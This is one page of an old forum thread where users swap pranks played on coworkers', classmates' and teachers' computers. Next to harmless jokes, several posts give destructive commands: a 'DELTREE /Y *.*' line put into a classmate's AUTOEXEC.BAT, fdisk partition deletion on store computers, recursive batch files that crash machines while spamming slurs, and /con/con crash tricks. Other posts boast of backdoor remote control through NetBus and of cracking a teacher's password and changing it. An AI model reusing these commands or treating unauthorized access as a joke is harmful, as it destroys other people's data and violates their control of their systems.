Computer Pranks - Page 5
Page 5 of 6 FirstFirst ... 3 4 5 6 LastLast

Thread: Computer Pranks

Talking

Yet again another wallpaper...

Use paint to create your own BSOD messages. My favorite one is something like..

" Error 600666: Tear in Krnl.E=Mc3. Universe Halted. Please contact your System Administrator. "

Set it as the Active Desktop wallpaper with Icons hidden. Be sure to put a bunch of other memory address lines in it to make it really intimidating...
    Live long, die rich, leave a 20yo widow...

Talking

Ive used VNC in some nefarious ways as well. Also NetBus a few times... I do support on a campus and have one or the other installed on most machines.
    The great thing about "backdoors" is that you can see what the user is doing at the time of your little prank.. I would wait untill I found someone on our campus network that was playing a game of solitaire and I would pop up a message on their screen saying " To continue playing, please insert $1 ..." and then remotely pop the CDRom tray open. Usually they would just cancel the message and push the CD tray closed again and continue playing. So, once again, out pops the CD tray, and another message " No money detected... Please insert $1 to continue playing..." pops up. By this time they are getting annoyed and would cancel the message and close the tray. Up pops the message " No money detected... Game Over!", and I close out Solitare and remotely shut down the computer! This was a great prank to play on those poor individuals who werent really computer savy. The joke became even funnier one time when I got called down to check out a PC in one of the computer labs that the CD rom wasnt working in... there was a $1 bill stuck in the drive!!
    Live long, die rich, leave a 20yo widow...

Cool

The Best one a co-worker and I did, was too this pain in the A$$ guy who called the Help Desk everyday complaining about one thing or another.

This Guy had a logictech cordless mouse and on the bottom of the receiver was a switch to use one or two devices, so one morning this guy goes into a meeting and we switch the receiver over to two devices and got our hands on another logictech mouse and setup in another cube to where we could see his display and waited till he return and let the fun begin.

We had fun for about twenty minutes before one of the guys co-workers caught us. This guy never call the Help Desk again.
    "He didn't hit ya, He didn't bump ya, He Rub ya, and Rubin Son is Racing" -Days of Thunder

<a href="http://www.computerpranks.com/" target="_blank">Computer Pranks</a> this site has all the good pranks and installs, take a look it's worth it.
    Almighty Elbatcho Della Vente, Scurge von AOL, Tyrant von NT, Huhn des Schulegeländes, großartiger hinterer Viceroy Admiral der oberen nordöstlichen südlichen Zustand Widder K-Auto Kategorie des bedwetting Auslesesuperschutzes der Eastwestern Grafschaften, des Spam deathlord des Spam'o'knights, des Spacemonkey und des stolzen Inhabers von 250 mindestens meine kleinen Ponies

also a great prank is to install MS Bob on someones pc, it's just so anoying and horrible but hours of fun to watch them try and figure it out.
    Almighty Elbatcho Della Vente, Scurge von AOL, Tyrant von NT, Huhn des Schulegeländes, großartiger hinterer Viceroy Admiral der oberen nordöstlichen südlichen Zustand Widder K-Auto Kategorie des bedwetting Auslesesuperschutzes der Eastwestern Grafschaften, des Spam deathlord des Spam'o'knights, des Spacemonkey und des stolzen Inhabers von 250 mindestens meine kleinen Ponies

well i remember when this topic went around last year and i like the one about switching 2 wires on a network cable that still shows as there is a link but no activity

also one someone also mentioned was something that they would do at radio shack was to have the sames man distracted open a dos window and type fdisk and delete the partions then close the window but don't restart wait for them to restart the computer the next day and get no os found

[quote]Originally posted by MorticiaAdams:
    <strong>I love messing with my manager when it comes to the computer that him and the other female manager love to be on when they should be on the floor with us. So anything I can do to mess with them I do. I have a limited amout of access to what I can do.
    Today I changed his tool bar on him and he almost went nuts trying to change it back. I had to since he couldnt figure it out.
    Now I would really like to get this woman one she trully gets on my nerves. Shes always on the computer doing stuff just to sit on her butt.</strong><hr></blockquote>

When she does step away from the system, edit the MSDOS.SYS file to BOOTGUI=0
    That usually throws most of the 'sane' techs into a blind panic here <VBEG>
    Stress.... The uncontrollable urge to choke the living $417 out of someone who desperately needs it.

Ignorance.... The inherent capacity to demand of someone else that which one is too lazy to learn/perform for one's self.

User....An individual who, through immense proportions of ignorance, create stress.

Just had the idea of using active desktop to display a frames based webpage that contains a frame to "/con/con". Would cause a merry little mess.
    "The major difference between a thing that might go wrong and a thing that cannot possibly go wrong is that when a thing that cannot possibly go wrong goes wrong it usually turns out to be impossible to get at or repair."

The Hitchikers Guide to the Universe - Mostly Harmless - Douglas Adams

frames web page... thats alot of work just save a batch file in the starup folder of windows

and insert the followin line into it:

/con/con

or you want a really good prank create a batch file called batch1.bat that looks like this

net send %username% IM GAY or something like that
    ping -t 127.0.0.1
    start batch2.bat

now batch2.bat looks like this
    net send %username% IM GAY
    ping -t 127.0.0.1
    start batch1.bat

if you have over 512 megs of ram it will just make alot of noise for about 5 minutes before the machine reboots.
    if you have 4 gigs of ram, only takes 12 minutes
    but with the amount of windows that open , there is no way to stop it......alt+f4 dont work =-(
    spent all day one day working on that batch file lol but the look is great when your in a active directory class , i did it to the teachers machine, while the projector was on and every thing, when the machine rebooted, he couldnt log in i changed his password using terminal services.

I LOVE LOPHT CRACK .... his password was class

apperntly he shouldnt be a admin or teaching admins with a password like that
    Luke, OBGYN Kanobi is the only one!!

correction the files should look like this

:start
    ping -t 127.0.0.1
    start batch2.bat
    goto start

:fun
    ping -t 127.0.0.1
    start batch1.bat
    goto fun
    Luke, OBGYN Kanobi is the only one!!

Milkman

When I was going to vo-tech, there was this dork in our class that would always bring in viruses. For for like 3 months, randomly I would get to his PC before he got there in the morning and edit his AUTOEXEC.BAT file for the first line to read: @ECHO OFF
    DELTREE /Y *.*

Needless to say he would be upset. :--)

Milkman

The computer pranks site has the IO error on it at

<a href="http://www.rjlsoftware.com/software/entertainment/bomb/screenshots/mainscreen.jpg" target="_blank">http://www.rjlsoftware.com/software/entertainment/bomb/screenshots/mainscreen.jpg</a>

Just FYI for anyone who wanted it.

Ok - I just did this:

Made the wallpaper an IO error. Put the bomb.exe in the start menu (it makes a fake IO error). I also turned the mouse double click function to the fastest setting.

The guy will come in and get the IO error. He will close it and the wall paper will be there and you can't close the wallpaper. He will click the icons and they will not double click unless he's a speed deamon with the mouse. might suffice for emulating a system freeze up.

I also set the sound scheme to jungle and made sure every even on the PC has a sound for it. I did this just so he would know we were playing with his PC so he doesn't go crawling to our desktop techs for help.

[quote]Originally posted by drewber:
    <strong>correction the files should look like this

ping -t 127.0.0.1
    start batch2.bat
    goto start

ping -t 127.0.0.1
    start batch1.bat
    goto fun</strong><hr></blockquote>

correction the files should look like this

net send * Hello did you know im a PHAG!!!!
    ping -t 127.0.0.1
    start batch2.bat
    goto start

net send * Thats right im a PHAG!!! Im GAY!!!
    ping -t 127.0.0.1
    start batch1.bat
    goto fun
    http://www.amd.com/us-en/assets/cont...uts/athlon.gif

Do you leak any fluids, do you have any bumps on your rear, do you have any unpleasant odors?
    If you answered yes to any of these then you are not qualified to own a new AMD ATHLON XP.
    If someone ask you if you are running the all-new fastest AMD ATHLON XP, just turn around and reply "WHY YES, AND ITS CERTIFIED"

http://www.daemonprojects.com/

Avatar Goes Here Radical Dreamer's Avatar

Whats with the /con/con ? I have heard that5 it locks your system up but everytime that I have tried it doesnt work
    :::Asus A8N-Sli Premium:::AMD 3500+ @ 2.4ghz:::2x80GB 8mb cache RAID0 Array:::GeForce 7800GTX OC:::2GB Corsair XMS Memory:::500 Watt Enermax Liberty PSU:::16x Lite-on DVDRW:::

Counter Strike Source Forum and Server @ http://www.nvpclan.com -=Ninjas Vs. Pirates=-